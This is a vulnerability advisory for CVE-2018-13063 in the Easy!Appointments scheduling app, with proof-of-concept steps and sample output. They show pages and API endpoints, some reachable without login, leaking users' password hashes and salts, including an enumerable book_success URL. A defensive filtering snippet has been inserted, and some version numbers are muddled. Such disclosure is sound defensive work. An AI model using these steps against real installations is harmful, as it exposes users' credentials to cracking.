Description

Easy!Appointments is a highly customizable web application that offers scheduling management for businesses.

Threat

Without being authenticated, an attacker can collect users' information, including hashed passwords and salts.

Expectation

The application should only send strictly necessary information. It should never send hashed passwords.

Vulnerability Type

CVE ID: CVE-2018-13063

Access Vector: network

Security Risk: high

Vulnerability: CWE-200

CVSS Base Score: 7.5

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Details

The Easy!Appointments application has multiple interfaces which leak users' information, including hashed passwords and salts.

Proof of Concept 1 : Unauthenticated providers' information leak

Without being authenticated, it is possible to collect provider data.

Steps :

1/ Visit the application (e.g. visit localhost)

2/ Select a service and a provider

3/ Choose an appointment date and time

4/ Fill required information

5/ Search the source code of the page "Your appointment has been successfully registered!" for GlobalVariables :

var GlobalVariables = {
          [...]
          'providerData': {
              "id": "85",
              "first_name": "John",
              "last_name": "Doe",
              "email": "[email protected]",
              "mobile_number": "",
              "phone_number": "0123456789",
              "address": "",
              "city": "",
              "state": "",
              [...]
              "settings": {
                  "username": "johndoe",
                  "password": "b7bfe806d58fe09deabfe686a65b49b8a012dbf210033f1acb284ad75a6ba6b6",
                  "salt": "5c67f8e9b16f391a2d94606c9a1c3e8e8be47a47c7292dbe78ba4a75e60871e6",
                  [...]
                  "google_sync": "0",
                  "google_token": "",
                  "google_calendar": "",
                  "sync_past_days": "5",
                  "sync_future_days": "5",
                  "calendar_view": "default"
              }
          },

6/ The book_success page can be enumerated to obtain other users' data: pass the user ID as in index.php/appointments/book_success/<ID>, for instance http://localhost/index.php/appointments/book_success/63.

Proof of Concept 2 : Information leakage in the admin interface

In the admin interface, at the user tab, the API leaks hashed passwords and salts.

  • User tab, at index.php/backend/users (output truncated for the sake of brevity):

var GlobalVariables = {
    csrfToken: "7349322823ef8b3ed03a2bcdb17b6001",
    baseUrl: "http:\/\/localhost",
    dateFormat: "DMY",
    admins: [{
        "id": "84",
        "first_name": "admin",
        "last_name": "admin",
        "email": "[email protected]",
        "mobile_number": "",
        "phone_number": "adminn",
        "address": "",
        "city": "",
        "state": "",
        "zip_code": "",
        "notes": "",
        "id_roles": "1",
        "settings": {
            "username": "admin",
            "password": "5c3716a135b95d6f07d6549a7842386915ee14fd9a003c287f74c5588b7f1fea",
            "salt": "0b12403b95c62f4aaa75ddaa6f5dcb8e54e3e6fe7b504ca97fd676ddfa70ecae",
            "working_plan": "",
            "notifications": "0",
            "google_sync": "0",
            "google_token": "",
            "google_calendar": "",
            "sync_past_days": "5",
            "sync_future_days": "5",
            "calendar_view": "default"
        }
    },
[...]

    providers: [{
        "id": "85",
        "first_name": "John",
        "last_name": "Doe",
        "email": "[email protected]",
        "mobile_number": "",
        "phone_number": "0123456789",
        "address": "",
        "city": "",
        "state": "",
        "zip_code": "",
        "notes": "",
        "id_roles": "2",
        "services": ["13"],
        "settings": {
            "username": "johndoe",
            "password": "b7bfe806d58fe09deabfe686a65b49b8a012dbf210033f1acb284ad75a6ba6b6",
            "salt": "5c67f8e9b16f391a2d94606c9a1c3e8e8be47a47c7292dbe78ba4a75e60871e6",
            [...]

};

  • index.php/backend_api/ajax_filter_admins (Users > Admins) : dumps admin information including password hashes and salts.

  • index.php/backend_api/ajax_filter_providers (Users > Providers) : dumps provider information including password hashes and salts.

  • index.php/backend_api/ajax_filter_secretaries (Users > Secretaries) : dumps secretary information including password hashes and salts.

Proof of Concept 3 : Information leakage in other interfaces

  • http://localhost/index.php/backend/settings : leaks password hash and salt of the current logged user.
  • http://localhost/index.php/backend_api/ajax_get_calendar_appointments leaks password hash and salt of "John Doe" (Default user).
  • http://localhost/index.php/backend_api/ajax_filter_customers leaks password hash and salt of "John Doe" (Default user).
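The expectation above (send only what the page needs, never hashed passwords) can be checked and enforced with a small allowlist filter. The following is an added example, not code from Easy!Appointments: it walks a decoded user record of the same shape as the leaked providerData object, reports the paths of secret keys, and returns a copy whose settings are reduced to an allowlist. The sample record and the allowlist are constructed assumptions.

```python
# Constructed sample mirroring the shape of the leaked providerData object
# in the advisory; the hash and salt values are placeholders, not real data.
SAMPLE_PROVIDER = {
    "id": "85",
    "first_name": "John",
    "last_name": "Doe",
    "email": "john.doe@example.com",
    "settings": {
        "username": "johndoe",
        "password": "<hash-placeholder>",
        "salt": "<salt-placeholder>",
        "google_token": "",
        "working_plan": "",
        "calendar_view": "default",
    },
}

# Keys a user record must never carry when it is sent to a browser.
SECRET_KEYS = {"password", "salt", "google_token"}

# Settings a booking page legitimately needs (assumed allowlist); everything
# else is dropped rather than relying on a denylist that can fall behind.
PUBLIC_SETTINGS = {"username", "working_plan", "calendar_view"}


def exposed_secret_paths(obj, path=""):
    """Walk a decoded JSON structure and return dotted paths of secret keys."""
    found = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            here = f"{path}.{key}" if path else key
            if key in SECRET_KEYS:
                found.append(here)
            found.extend(exposed_secret_paths(value, here))
    elif isinstance(obj, list):
        for i, item in enumerate(obj):
            found.extend(exposed_secret_paths(item, f"{path}[{i}]"))
    return found


def strip_user_secrets(record):
    """Return a copy of a user record with settings reduced to the allowlist."""
    clean = {k: v for k, v in record.items() if k != "settings"}
    settings = record.get("settings", {})
    clean["settings"] = {k: v for k, v in settings.items() if k in PUBLIC_SETTINGS}
    return clean


if __name__ == "__main__":
    print("leaked:", exposed_secret_paths({"providerData": SAMPLE_PROVIDER}))
    print("sanitized:", strip_user_secrets(SAMPLE_PROVIDER))
```

Running exposed_secret_paths over a decoded GlobalVariables blob captured from your own instance is a quick way to confirm that an update actually removed the fields listed in this advisory.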

Affected versions

Versions 1.3.0 and prior to 1.2.1 - other versions have not been tested.

Solution

Update to a version later than 1.3.2.

Timeline (dd/mm/yyyy)

  • 06/03/2018 : Initial discovery
  • 17/04/2018 : Vendor contact
  • 17/05/2018 : Vendor technical team acknowledgment
  • 15/08/2018 : Vendor submits a private 2.2.16.128 pre-release that, according to our tests, did not mitigate the issue.
  • 25/10/2019 : Public disclosure

Credits

  • Pierrick VERAN, Sysdream (p.veran -at- sysdream -dot- com)